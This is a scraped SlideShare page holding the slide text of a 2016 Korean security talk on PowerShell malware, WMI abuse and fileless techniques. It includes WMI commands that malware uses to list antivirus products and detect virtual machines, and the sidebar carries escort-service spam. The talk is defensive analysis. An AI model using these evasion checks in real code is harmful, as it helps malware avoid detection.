Submit Search
Upload
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
•
6 likes
•
3,225 views
Minseok(Jacky) Cha
Follow
PowerShell Malware & Fileless Technique
Read less
Read more
Technology
Slideshow view
Report
Share
Slideshow view
Report
Share
1 of 66
Download now
Download to read offline
Recommended
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Minseok(Jacky) Cha
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Minseok(Jacky) Cha
Tick group @avar2019 20191111 cha minseok_publish
Tick group @avar2019 20191111 cha minseok_publish
Minseok(Jacky) Cha
From stealing confidential data to revenue-generating attacks
From stealing confidential data to revenue-generating attacks
Minseok(Jacky) Cha
Real-Time Static Malware Analysis using NepenthesFE
Real-Time Static Malware Analysis using NepenthesFE
Wasim Halani
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
CODE BLUE
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automated
Zoltan Balazs
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
Recommended
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Minseok(Jacky) Cha
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Minseok(Jacky) Cha
Tick group @avar2019 20191111 cha minseok_publish
Tick group @avar2019 20191111 cha minseok_publish
Minseok(Jacky) Cha
From stealing confidential data to revenue-generating attacks
From stealing confidential data to revenue-generating attacks
Minseok(Jacky) Cha
Real-Time Static Malware Analysis using NepenthesFE
Real-Time Static Malware Analysis using NepenthesFE
Wasim Halani
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
CODE BLUE
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automated
Zoltan Balazs
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
Next Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and Defense
Luca Simonelli
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
Andrew Morris
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
OSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adware
Amit Serper
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Andrew Morris
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
Detection Rules Coverage
Detection Rules Coverage
Sunny Neo
Malware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade Detection
Lastline, Inc.
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Lastline, Inc.
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
Security Weekly
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
CODE BLUE
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
grecsl
[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
Aj MaChInE
Computer security
Computer security
Mohamed Abdo
More Related Content
What's hot
Next Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and Defense
Luca Simonelli
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
Andrew Morris
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
OSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adware
Amit Serper
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Andrew Morris
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
Detection Rules Coverage
Detection Rules Coverage
Sunny Neo
Malware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade Detection
Lastline, Inc.
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Lastline, Inc.
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
Security Weekly
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
CODE BLUE
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
grecsl
What's hot
(20)
Next Generation Advanced Malware Detection and Defense
Next Generation Advanced Malware Detection and Defense
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
OSX/Pirrit: The blue balls of OS X adware
OSX/Pirrit: The blue balls of OS X adware
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
Detection Rules Coverage
Detection Rules Coverage
Malware in the Wild: Evolving to Evade Detection
Malware in the Wild: Evolving to Evade Detection
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
Aj MaChInE
Computer security
Computer security
Mohamed Abdo
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
SegInfo
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0
Michael Gough
Introduction to Exploitation
Introduction to Exploitation
primeteacher32
Backtrack
Backtrack
One97 Communications Limited
Open Source Malware Lab
Open Source Malware Lab
ThreatConnect
Security Handbook
Security Handbook
Anthony Hasse
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
dc612
Flash it baby!
Flash it baby!
Soroush Dalili
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
grecsl
Bz backtrack.usage
Bz backtrack.usage
djenoalbania
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
ThreatReel Podcast
EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22
MichaelM85042
AppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 Primer
ThreatReel Podcast
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
InfosecTrain
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence Morocco
Touhami Kasbaoui
Securitytools
Securitytools
Richmond Adebiaye
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
MichaelM85042
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
MichaelM85042
Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
(20)
[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
Computer security
Computer security
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
You need a PROcess to catch running processes and their modules_v2.0
You need a PROcess to catch running processes and their modules_v2.0
Introduction to Exploitation
Introduction to Exploitation
Backtrack
Backtrack
Open Source Malware Lab
Open Source Malware Lab
Security Handbook
Security Handbook
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
Flash it baby!
Flash it baby!
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Bz backtrack.usage
Bz backtrack.usage
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22
AppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 Primer
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence Morocco
Securitytools
Securitytools
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
More from Minseok(Jacky) Cha
2017년 3분기 정보보안 소식 20180107 차민석
2017년 3분기 정보보안 소식 20180107 차민석
Minseok(Jacky) Cha
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Minseok(Jacky) Cha
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Minseok(Jacky) Cha
2017년 1분기 정보보안 소식 20170528 차민석_공개판
2017년 1분기 정보보안 소식 20170528 차민석_공개판
Minseok(Jacky) Cha
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
Minseok(Jacky) Cha
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
Minseok(Jacky) Cha
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
Minseok(Jacky) Cha
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
Minseok(Jacky) Cha
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
Minseok(Jacky) Cha
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
Minseok(Jacky) Cha
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
Minseok(Jacky) Cha
Csi cyber season 1 episode 1 차민석 20160113
Csi cyber season 1 episode 1 차민석 20160113
Minseok(Jacky) Cha
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
Minseok(Jacky) Cha
2015년 1분기 주요 정보보안 소식 20150512 공개판
2015년 1분기 주요 정보보안 소식 20150512 공개판
Minseok(Jacky) Cha
More from Minseok(Jacky) Cha
(16)
2017년 3분기 정보보안 소식 20180107 차민석
2017년 3분기 정보보안 소식 20180107 차민석
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
2017년 1분기 정보보안 소식 20170528 차민석_공개판
2017년 1분기 정보보안 소식 20170528 차민석_공개판
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
Csi cyber season 1 episode 1 차민석 20160113
Csi cyber season 1 episode 1 차민석 20160113
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
2015년 1분기 주요 정보보안 소식 20150512 공개판
2015년 1분기 주요 정보보안 소식 20150512 공개판
Recently uploaded
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
Evaluating the top large language models.pdf
Evaluating the top large language models.pdf
ChristopherTHyatt
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
naman860154
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
debabhi2
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
lior mazor
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
wesley chun
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Rafal Los
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
The Digital Insurer
Recently uploaded
(20)
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Evaluating the top large language models.pdf
Evaluating the top large language models.pdf
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
1.
PowerMalware ?! 2016.11.18 –
공개판 안랩 시큐리티대응센터(ASEC) 분석팀 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임 연구원 PowerShell 를 이용한 악성코드와 기법
2.
© AhnLab, Inc.
All rights reserved. 2 :~$whoami Profile − 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) − 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작 − 1989년 : Brain virus 변형 감염 − 1997년 : AhnLab 입사 − AhnLab 책임 연구원 (Senior Malware Researcher) − 시큐리티 대응센터(ASEC) 분석팀에서 악성코드 분석 및 연구 중 - 민간합동 조사단, 사이버보안 전문단 - vforum, AVED, AMTSO 멤버 - Wildlist Reporter
3.
© AhnLab, Inc.
All rights reserved. 3 :~$whoami • 책 -보안에미쳐라(2016) * Source:http://www.yes24.com/24/goods/29333992
4.
© AhnLab, Inc.
All rights reserved. 4 시작하기 전에 • 보안이 완벽한 시스템은 이 세상에 없어 - MatthewBroderick주연위험한게임(WarGames) * Source:WarGames(1983)
5.
© AhnLab, Inc.
All rights reserved. 5 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
6.
Contents 01 02 03 04 05 06 07 PowerShell PowerShell를 이용한 악성코드 Technique 파일
종류 Fileless Technique Case Study 맺음말
7.
01 PowerShell
8.
© AhnLab, Inc.
All rights reserved. 8 PowerShell • PowerShell - 2006년공개된ScriptLanguage -WindowsVista이후기본탑재 * Source:https://msdn.microsoft.com/en-us/powershell
9.
© AhnLab, Inc.
All rights reserved. 9 Windows Management Instrumentation (WMI) • WMI - * Source:https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
10.
© AhnLab, Inc.
All rights reserved. 10 Windows Management Instrumentation (WMI) • WMIArchitecture - * Source:http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
11.
© AhnLab, Inc.
All rights reserved. 11 PowerShell + WMI • AntiVirus제품 정보 얻기 - get-wmiobject -Namespace rootSecurityCenter2 -Class AntiVirusProduct
12.
© AhnLab, Inc.
All rights reserved. 12 PowerShell + WMI • 가상환경 검사 - Get-WmiObject –Class Win32_ComputerSystem
13.
02 PowerShell을 이용한 악성코드
14.
© AhnLab, Inc.
All rights reserved. Timeline Monad 발표 1993 1998 2000 2004 2006 2007 2013 2014 2015 Poweliks 2016 PowerShell 공개 PowerShell + Macro 등장 VB Script 악성코드 PowerShell Downloader 범람 PowerShell 악성코드 POC Macro virus 2017 Loveletter PowerShell Ransomware Kovter 향상된 Batch virus BedepPhase WMI 이용한 Fileless 침해사고
15.
© AhnLab, Inc.
All rights reserved. 15 1995 – Macro virus • 1995년 – 2001년: Macro virus전성기 - * Source:
16.
© AhnLab, Inc.
All rights reserved. 16 2000 - Loveletter • 2000년 5월 4일 LoveLettervirus - email로전파 -Iloveyou라는메일제목의사회공학기법사용 -그림,음악파일파괴
17.
© AhnLab, Inc.
All rights reserved. 17 2004 – Monad • 우려 - 2004년Monad개발 * Source:https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
18.
© AhnLab, Inc.
All rights reserved. 18 2006 - PowerShell 악성코드 POC • PowerShellPOC 악성코드 - * Source:https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
19.
© AhnLab, Inc.
All rights reserved. 19 2006 - PowerShell Released • PowerShellReleased - * Source:http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
20.
© AhnLab, Inc.
All rights reserved. 20 2013 – PowerShell Ransomware • PowerShellRansomware등장 - * Source:https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
21.
© AhnLab, Inc.
All rights reserved. 21 2014 - Poweliks • Poweliks -Registry내저장 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
22.
© AhnLab, Inc.
All rights reserved. 22 2014 - Phase • Phase -2013년발견된Solarbot변형 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
23.
© AhnLab, Inc.
All rights reserved. 23 2015 – WMI 악용 • Black Hat2015 - * Source:https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A- Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
24.
© AhnLab, Inc.
All rights reserved. 24 2015 - PowerShell 악성코드 증가 시작 • PowerShell악성코드 증가 - * Source:https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
25.
© AhnLab, Inc.
All rights reserved. 25 2016 - Macro + PowerShell • Macro + PowerShell - * Source:http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
26.
© AhnLab, Inc.
All rights reserved. 26 2016 - PowerShell 이용한 악성코드 유행 • PowerShell이용한 악성코드 유행 - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
27.
03 Technical
28.
© AhnLab, Inc.
All rights reserved. In-the-Wild 악성코드 조건 조건 많은 사용자 보안 체계 허점 손쉬운 제작
29.
© AhnLab, Inc.
All rights reserved. PowerShell 악성코드 장점 장점 강력한 기능 손쉬운 제작 행위 기반 제품 우회 가능성
30.
© AhnLab, Inc.
All rights reserved. 30 주요 감염 경로 • 주요 감염 경로 Mail − 첨부 파일 혹은 Link icon Web Browser − Exploit Kit 이용 − Fileless 악성코드 감염에도 이용
31.
© AhnLab, Inc.
All rights reserved. 31 감염 경로 • Mail -
32.
© AhnLab, Inc.
All rights reserved. 32 PowerShell 실행 • 실행 권한 - DownloadFile명령의개별명령과스크립트실행테스트 -개별명령은실행되지만스크립트는정책상실행되지않음
33.
© AhnLab, Inc.
All rights reserved. 33 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:https://technet.microsoft.com/en-us/library/ee176847.aspx
34.
© AhnLab, Inc.
All rights reserved. 34 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
35.
© AhnLab, Inc.
All rights reserved. 35 기능 • Downloader혹은 Dropper - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
36.
04 파일 종류
37.
© AhnLab, Inc.
All rights reserved. 종류 종류 Office (DOC, DOCM, XLS, XLSM) Shortcut (LNK) PowerShell (PS1) Windows ScriptFile (WSF), HTML Application (HTA) Java Script /Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
38.
© AhnLab, Inc.
All rights reserved. 38 Java Script - JS • JavaScript(JS) -
39.
© AhnLab, Inc.
All rights reserved. 39 Visual Basic Script • VisualBasicScript(VBS) -
40.
© AhnLab, Inc.
All rights reserved. 40 Windows Script File (WSF) • WSF(WindowsScriptFile) - 대부분JavaScript
41.
© AhnLab, Inc.
All rights reserved. 41 Windows Script File (WSF) • WSF(WindowsScriptFile) -
42.
© AhnLab, Inc.
All rights reserved. 42 HTMLApplication (HTA) • HTMLApplication(HTA) -대부분JavaScript
43.
